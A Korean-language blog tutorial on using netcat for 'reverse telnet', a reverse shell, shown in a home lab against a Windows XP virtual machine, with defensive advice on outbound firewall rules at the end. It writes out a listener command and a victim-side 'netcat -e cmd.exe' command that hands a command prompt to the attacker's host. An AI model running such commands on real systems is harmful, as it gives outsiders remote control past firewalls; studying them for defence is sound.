Synchronized's Database
[Tool]netcat 을 사용한 Reverse Telnet 사용하기 본문
반응형
1.개요
이전 포스팅에는 netcat을 사용해서 포트스캔하는 방법을 알아봤습니다. 이번에는 netcat을 사용해서 리버스텔넷을 하는 방법을 알아볼께요.
2.설명
리버스텔넷은 주로 앞단에 방화벽이 존재하는 시스템을 공격할 때 사용됩니다.
보통 방화벽 정책을 보면, 인바운드 정책은 80포트 이외에 필요한 포트만 열어놓고 나머지 포트는 허용을 시키지 않습니다. 하지만 아웃바운드 정책에 대해서는 별다른 필터링 정책을 걸어놓지 않기 때문에 리버스텔넷이 유용하다고 볼 수 있습니다.
일반적으로 보통 텔넷은 클라이언트가 서버에 접속하지만, 리버스 텔넷은 서버가 클라이언트에 접속을 하게 됩니다.
이론만 봐서는 글쓰는 저도 이해가 잘 안가네요. 실습을 한번 해보겠습니다. ㅋ
실험 환경은 다음과 같습니다.
공격자가 제 PC이며 가상머신의 WinXP를 서버라고 가정해 보겠습니다.
서버의 IP를 우선 확인해 보겠습니다. 아래 그림과 같습니다.
다음은 공격자의 IP를 알아보겠습니다.
이런 제 이름이 나왔네요.. 이건 신경쓰시지 마시고요. 일단 공격자 IP와 서버 IP를 확인해 보았습니다.
서버 : 10.0.2.15
공격자 : 192.168.0.117
이제 공격자는 netcat을 이용하여 50005번 포트를 열어놓도록 하겠습니다.
명령어는 다음과 같습니다.
netcat -l -p 50005
여기서 -p는 포트로 뒤에 숫자의 포트를 -l LISTENING 즉, 50005번 포트에서 접속을 대기하고 있겠다 라는 의미입니다.
좀 더 자세한 netcat의 옵션은 이전 포스팅의 첨부된 netcat sheet를 참조하시기 바랍니다.
공격자의 50005번 포트가 LISTENING 상태가 되어있는지 한 번 확인해 볼까요? ㅋ
네.. 대기타고 있군요.
이제 서버에서 공격자로 50005번 포트로 접속을 하기만 하면 됩니다.
서버에서 명령은 다음과 같습니다.
netcat -e cmd.exe [공격자IP주소] [공격자가 대기중인 포트]
이제 그럼 공격자 측에서는 어떤 상황이 벌어졌는지 한번 확인해 보겠습니다.
공격자에서 서버측의 명령 프롬프트가 열렸습니다.
여기서 공격자의 50005번 네트워크 접속상태를 한번 확인해 보겠습니다.
LISTENING이 아닌 ESTABLISHED 가 확인이 되었습니다.
3.결론
리버스텔넷을 설명하고 실습까지 해보았는데요... 리버스텔넷을 막기 위해 보안관리자들은 방화벽의 아웃바운드 정책을 타이트하게 할 필요가 있겠습니다. 그리고 파일업로드 공격에 대해 잘 대응하면 될 것 같습니다.
여기까지 리버스텔넷에 대한 설명이었습니다. Ubuntu로도 설명을 하려고 했는데, 포스팅이 너무 길어질 것 같아서 윈도우로만 하였습니다.
감사합니다.
반응형
'정보보안이야기 > 네트워크 보안' 카테고리의 다른 글
[Tool]netcat 사용법 (0) | 2012.03.08 |
---|---|
[VPN]Tun/tap interface tutorial (0) | 2011.12.27 |
Network Security 관련해서 앞으로 여러가지 글을 올릴 예정입니다. (0) | 2011.11.28 |